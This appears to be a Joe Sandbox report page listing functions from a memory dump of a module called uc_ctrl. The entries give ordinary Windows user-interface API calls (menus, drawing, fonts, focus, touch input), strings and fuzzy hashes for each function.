Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Object$MessageSend$MetricsSelectStock$ClientH_prolog3H_prolog3_RectRedrawSystemTextWindow
String ID:
API String ID: 591413167-0
Opcode ID: 98cd06938c6bdc2b6e527c7810c94688b28be37295eb804c77565af42a8e59e1
Instruction ID: 0c5e7e33cf533533755b3632cb8d096958236d99b6994c442ebb41f2909dd6c7
Opcode Fuzzy Hash: 98cd06938c6bdc2b6e527c7810c94688b28be37295eb804c77565af42a8e59e1
Instruction Fuzzy Hash: 7B815971A006149BCF06CF68C884BAE3BB6FF49704F1841B9E909AF3A9DB349915CF51

Function 6CB4067E Relevance: 15.2, APIs: 10, Instructions: 195stringwindowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB40688
CopyRect.USER32(?,?), ref: 6CB406C9
DrawFocusRect.USER32(?,?), ref: 6CB406DC
CreateSolidBrush.GDI32(?), ref: 6CB4071C
GetBkColor.GDI32(?), ref: 6CB4074A
CreateSolidBrush.GDI32(00000000), ref: 6CB40751
FillRect.USER32(?,?,00000000), ref: 6CB40779
GetObjectW.GDI32(?,0000005C,?), ref: 6CB40811
lstrcpyW.KERNEL32(?,00000001), ref: 6CB4081E
CreateFontIndirectW.GDI32(?), ref: 6CB40844

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CreateRect$BrushSolid$ColorCopyDrawFillFocusFontH_prolog3_IndirectObjectlstrcpy
String ID:
API String ID: 3396929888-0
Opcode ID: 841e625126e01924cc9f00c72a69bd6c2e4f450f2478b720af3d2d8b0d45f5d9
Instruction ID: e59e986ed2b28fcd81507e4ae6f3f8a8101b88fce1126a73a792d531ddf7143a
Opcode Fuzzy Hash: 841e625126e01924cc9f00c72a69bd6c2e4f450f2478b720af3d2d8b0d45f5d9
Instruction Fuzzy Hash: E581CE71A002589FDF15DFA4C859BEEBB75FF18308F048088E90AA7695EF34A949DF50

Function 6CB1FD9C Relevance: 15.1, APIs: 10, Instructions: 145windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB1FDA6
GetMenuItemCount.USER32(?), ref: 6CB1FDD2
GetSubMenu.USER32(?,00000000), ref: 6CB1FE08
GetMenuState.USER32(?,?,00000400), ref: 6CB1FE25
GetSubMenu.USER32(?,00000000), ref: 6CB1FE82
GetMenuStringW.USER32(?,?,?,00000100,00000400), ref: 6CB1FEAB
AppendMenuW.USER32(?,00000010,?,?), ref: 6CB1FF25
GetMenuItemCount.USER32(00000000), ref: 6CB1FF96
InsertMenuW.USER32(?,00000000,?,00000000), ref: 6CB1FFC3
GetMenuItemID.USER32(?,?), ref: 6CB1FFF4

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Menu$Item$Count$AppendH_prolog3_InsertStateString
String ID:
API String ID: 2171526683-0
Opcode ID: a65a5a6cd062233ab22db6456fbed68d632f1df3c4e0492553a6a7dfd935a85a
Instruction ID: 0ec4edfba27b9ca51c8dcb385c60c2a099bcbf62afcad0eaf54b028545f1e0f2
Opcode Fuzzy Hash: a65a5a6cd062233ab22db6456fbed68d632f1df3c4e0492553a6a7dfd935a85a
Instruction Fuzzy Hash: D3613571946228AFDF20DF64CD8CBDABBB4FB19304F1041E9E809A6A50DB349E81CF11

Function 6CB48B51 Relevance: 15.1, APIs: 10, Instructions: 109windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB48B58

Part of subcall function 6CB25025: __EH_prolog3.LIBCMT ref: 6CB2502C
Part of subcall function 6CB25025: GetDC.USER32(00000000), ref: 6CB25058

IsRectEmpty.USER32(?), ref: 6CB48B73
InvertRect.USER32(?,?), ref: 6CB48B89
SetRectEmpty.USER32(?), ref: 6CB48B96
GetClientRect.USER32(00000000,00000000), ref: 6CB48BE3
GetSystemMetrics.USER32(00000015), ref: 6CB48C01
GetSystemMetrics.USER32(00000015), ref: 6CB48C27
SendMessageW.USER32(?,0000120C,00000000,00000001), ref: 6CB48C67
SendMessageW.USER32(?,0000120C,00000001,00000001), ref: 6CB48C96
InvertRect.USER32(?,?), ref: 6CB48CA2

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$EmptyInvertMessageMetricsSendSystem$ClientH_prolog3H_prolog3_
String ID:
API String ID: 3401445556-0
Opcode ID: 6a5cfeed1c0f287413497f58779affbeefb6ed1dd416ac235ee63e6d52849410
Instruction ID: dedf178738c201d83d8fe6684d526b6afd116ef5584fde516b85a1838607542b
Opcode Fuzzy Hash: 6a5cfeed1c0f287413497f58779affbeefb6ed1dd416ac235ee63e6d52849410
Instruction Fuzzy Hash: 52418B72901218DFDF01CFA8C888BEE7BB5FF06316F084169E805BB255DB756949CBA0

Function 6CB20008 Relevance: 15.1, APIs: 10, Instructions: 91windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB2000F
__CxxThrowException@8.LIBVCRUNTIME ref: 6CB20047
GetMenuItemCount.USER32(?), ref: 6CB20056
GetMenuItemCount.USER32(8007000E), ref: 6CB20062
GetSubMenu.USER32(8007000E,-00000001), ref: 6CB20079
GetMenuItemCount.USER32(00000000), ref: 6CB2008C
GetSubMenu.USER32(00000000,00000000), ref: 6CB2009D
RemoveMenu.USER32(00000000,00000000,00000400,?,?,?,8007000E,6CD14000,00000004,6CB1A963), ref: 6CB200B7

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Menu$CountItem$Exception@8H_prolog3RemoveThrow
String ID:
API String ID: 642076194-0
Opcode ID: e1c51adceea2e8972d3ec6773c456e4f98fa05a7740827c3380009b24db3b1c8
Instruction ID: 2b2322828bcbfe0f0db929994a42cad28b5903d0eece01ad8f71b07c9bf2c455
Opcode Fuzzy Hash: e1c51adceea2e8972d3ec6773c456e4f98fa05a7740827c3380009b24db3b1c8
Instruction Fuzzy Hash: CD31A0716022C9ABEF108F64DD18AAFBF78FB42354F108229F919A6A50DB74DA41CB54

Function 6CB3B557 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB1E9FD: __EH_prolog3_catch.LIBCMT ref: 6CB1EA04

GetModuleHandleW.KERNEL32(comctl32.dll,00000000,00000000,00000000,?,?,6CB36AFB,00000000,00000000,6CB35720,00000000,0000001C,6CB368F8,00000000,6CB35720), ref: 6CB3B58A
GetUserDefaultUILanguage.KERNEL32(?,?,6CB36AFB,00000000,00000000,6CB35720,00000000,0000001C,6CB368F8,00000000,6CB35720), ref: 6CB3B59B
FindResourceExW.KERNEL32(?,00000005,?,0000FC11,?,?,6CB36AFB,00000000,00000000,6CB35720,00000000,0000001C,6CB368F8,00000000,6CB35720), ref: 6CB3B5DA
FindResourceW.KERNEL32(?,?,00000005,?,?,6CB36AFB,00000000,00000000,6CB35720,00000000,0000001C,6CB368F8,00000000,6CB35720), ref: 6CB3B5F7
LoadResource.KERNEL32(?,00000000,?,?,6CB36AFB,00000000,00000000,6CB35720,00000000,0000001C,6CB368F8,00000000,6CB35720), ref: 6CB3B605

Part of subcall function 6CB3B6D3: _wcslen.LIBCMT ref: 6CB3B701
Part of subcall function 6CB3B6D3: GetDC.USER32(00000000), ref: 6CB3B729
Part of subcall function 6CB3B6D3: EnumFontFamiliesExW.GDI32(00000000,?,6CB3B6BD,?,00000000,?,?,?,?,?,?,00000000), ref: 6CB3B744
Part of subcall function 6CB3B6D3: ReleaseDC.USER32(00000000,00000000), ref: 6CB3B74C

GlobalAlloc.KERNEL32(00000040,00000000,00000000,00000000,6CB35720,00000000,0000001C,6CB368F8,00000000,6CB35720), ref: 6CB3B635

Strings

MS UI Gothic, xrefs: 6CB3B5B2
comctl32.dll, xrefs: 6CB3B585

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Resource$Find$AllocDefaultEnumFamiliesFontGlobalH_prolog3_catchHandleLanguageLoadModuleReleaseUser_wcslen
String ID: MS UI Gothic$comctl32.dll
API String ID: 2994302752-3248924666
Opcode ID: 8ff32194bffb1693ed77b98a2cf15821bbf14083017d6621654ed848edf8403e
Instruction ID: f9cfba5faded1cecc982550a6ebcb37500f6561f60ac298b0a18e0898f87a5b1
Opcode Fuzzy Hash: 8ff32194bffb1693ed77b98a2cf15821bbf14083017d6621654ed848edf8403e
Instruction Fuzzy Hash: 14412372705A96ABEB009B65CC09EAFB7B9EF41314F109528F919CBF81EB30DD01C621

Function 6CB1E330 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 112libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Comctl32.dll,00000000,00000000,00000002,Comctl32.dll,00000040), ref: 6CB1E4C5

Part of subcall function 6CB1E200: GetProcAddress.KERNEL32(00000000,?), ref: 6CB1E22D

GetModuleFileNameW.KERNEL32(?,?,00000105,?,6CB1E2C8,00000000,6CD13C18,00000010,6CB1F4F5,?,?,?,6CC8588C,?,00000001,0000000C), ref: 6CB1E3DF
SetLastError.KERNEL32(0000006F,?,6CB1E2C8,00000000,6CD13C18,00000010,6CB1F4F5,?,?,?,6CC8588C,?,00000001,0000000C,6CB1F54D,?), ref: 6CB1E3F3
GetLastError.KERNEL32(00000020), ref: 6CB1E44A

Strings

Comctl32.dll, xrefs: 6CB1E4B1, 6CB1E4B6, 6CB1E4C4
@, xrefs: 6CB1E4A0
, xrefs: 6CB1E3FE
GetModuleHandleExW, xrefs: 6CB1E393

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ErrorLast$AddressFileLibraryLoadModuleNameProc
String ID: $@$Comctl32.dll$GetModuleHandleExW
API String ID: 3640817601-4183358198
Opcode ID: 4e7c27aae46c2a3fa6205108056ee2888b863a772980f942d129555a5882c94e
Instruction ID: a867e5cbd93b7a08cc2999e0c52196182b6191c0ea9d1da3a45ce7a58745616d
Opcode Fuzzy Hash: 4e7c27aae46c2a3fa6205108056ee2888b863a772980f942d129555a5882c94e
Instruction Fuzzy Hash: C941C9719052D8AAFF208B658C4CBDE767CEB45318F2042A5E518E7D90DB78CA84CFD2

Function 6CB29F74 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 111libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll), ref: 6CB2A07F
__Init_thread_footer.LIBCMT ref: 6CB2A08F
GetProcAddress.KERNEL32(GetTouchInputInfo), ref: 6CB2A0C3
GetProcAddress.KERNEL32(CloseTouchInputHandle), ref: 6CB2A0D9
__Init_thread_footer.LIBCMT ref: 6CB2A0E5

Strings

CloseTouchInputHandle, xrefs: 6CB2A0C9
user32.dll, xrefs: 6CB2A07A
GetTouchInputInfo, xrefs: 6CB2A0B8

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: AddressInit_thread_footerProc$HandleModule
String ID: CloseTouchInputHandle$GetTouchInputInfo$user32.dll
API String ID: 2862038163-1853737257
Opcode ID: 62b0bd22083eeecc4be21c101f9d50a576322c6a011509517aa549dd3050add9
Instruction ID: fb8a3dd8fef2a9d8bdbb8e885d9604c9f94d74fe9cdf550fe6963eff021ff8fc
Opcode Fuzzy Hash: 62b0bd22083eeecc4be21c101f9d50a576322c6a011509517aa549dd3050add9
Instruction Fuzzy Hash: 2831F371A013609FDF109F68884CEAE7B7DFB4A364F50052BE91887A90DF38A815CF51

Function 6CB2AE21 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 76libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,?,?,?,?,?,?,?,00000000,?,6CB294A4,00000000,00000000), ref: 6CB2AEC2
__Init_thread_footer.LIBCMT ref: 6CB2AECE

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

GetProcAddress.KERNEL32(RegisterTouchWindow), ref: 6CB2AF02
GetProcAddress.KERNEL32(UnregisterTouchWindow), ref: 6CB2AF18
__Init_thread_footer.LIBCMT ref: 6CB2AF24

Strings

RegisterTouchWindow, xrefs: 6CB2AEF7
user32.dll, xrefs: 6CB2AEBD
UnregisterTouchWindow, xrefs: 6CB2AF08

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: AddressInit_thread_footerProc$Exception@8HandleModuleThrow
String ID: RegisterTouchWindow$UnregisterTouchWindow$user32.dll
API String ID: 3795892493-2470269259
Opcode ID: 69d512967a41066fa012ee6b3043d817ca3d1c74e1f5397731ad9d8445b94bcf
Instruction ID: fadd3ee3c7de3c84822d65310f0315f77a073a42bf969a466f0c7c1b515e7144
Opcode Fuzzy Hash: 69d512967a41066fa012ee6b3043d817ca3d1c74e1f5397731ad9d8445b94bcf
Instruction Fuzzy Hash: 412124B1604650CFDF00AF68C88CE5A37BAFB47329BA0055BE61883A80DB389853CF41

Function 6CB3B1A5 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 6CB3B1C7
GetStockObject.GDI32(0000000D), ref: 6CB3B1D3
GetObjectW.GDI32(00000000,0000005C,?), ref: 6CB3B1E4
GetDC.USER32(00000000), ref: 6CB3B1F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6CB3B20A
MulDiv.KERNEL32(?,00000048,00000000), ref: 6CB3B216
ReleaseDC.USER32(00000000,00000000), ref: 6CB3B222

Strings

System, xrefs: 6CB3B1BD, 6CB3B237

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 76478947a1d20e643160ffb3e137c35c775b7c70804f0860f8bfdd4b7418259f
Instruction ID: 796dca938ffa23dd1bd701ea67e0c52ebcd1333ca3ea105bfafa8ae72ba9ba3e
Opcode Fuzzy Hash: 76478947a1d20e643160ffb3e137c35c775b7c70804f0860f8bfdd4b7418259f
Instruction Fuzzy Hash: 8D117C71701758ABEB149B65CD49FBF7FB8EB46B41F041119FA09DB280EB709801C665

Function 6CB28D94 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 6CB28DDB
SetActiveWindow.USER32(?), ref: 6CB28DE6
SendMessageW.USER32(?,00000112,?,?), ref: 6CB28E00
IsWindow.USER32(?), ref: 6CB28E07
SetActiveWindow.USER32(?), ref: 6CB28E12
IsWindow.USER32(00000000), ref: 6CB28E19
SetFocus.USER32(00000000), ref: 6CB28E24

Strings

u, xrefs: 6CB28E2D

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: 24f7b549edb5e385d1f916085ba0d00c0ac980372258e77d827de7d72529fdea
Instruction ID: c1ad625a62794a8ad8186a2c0c3b50baac24216118a431ef299878ce65654ca1
Opcode Fuzzy Hash: 24f7b549edb5e385d1f916085ba0d00c0ac980372258e77d827de7d72529fdea
Instruction Fuzzy Hash: 4911E273302284ABDB022A74CC48A7F3B79FB4A359B148526E91D8ED89D73EC8008752

Function 6CBFA967 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CBFA96E

Part of subcall function 6CB1FAC0: EnterCriticalSection.KERNEL32(6CD57498,?,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FAF1
Part of subcall function 6CB1FAC0: InitializeCriticalSection.KERNEL32(00000000,?,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FB07
Part of subcall function 6CB1FAC0: LeaveCriticalSection.KERNEL32(6CD57498,?,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FB15
Part of subcall function 6CB1FAC0: EnterCriticalSection.KERNEL32(00000000,?,00000000,?,6CB2063F,00000000,?,?,6CAFF6D7,6CD5244C), ref: 6CB1FB22

GetProfileIntW.KERNEL32(windows,DragScrollInset,0000000B), ref: 6CBFA9B9
GetProfileIntW.KERNEL32(windows,DragScrollDelay,00000032), ref: 6CBFA9CC
GetProfileIntW.KERNEL32(windows,DragScrollInterval,00000032), ref: 6CBFA9DF

Strings

DragScrollInterval, xrefs: 6CBFA9D4
windows, xrefs: 6CBFA9B3, 6CBFA9B8, 6CBFA9C6, 6CBFA9D9
DragScrollDelay, xrefs: 6CBFA9C1
DragScrollInset, xrefs: 6CBFA9AE

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CriticalSection$Profile$Enter$H_prolog3InitializeLeave
String ID: DragScrollDelay$DragScrollInset$DragScrollInterval$windows
API String ID: 4229786687-1024936294
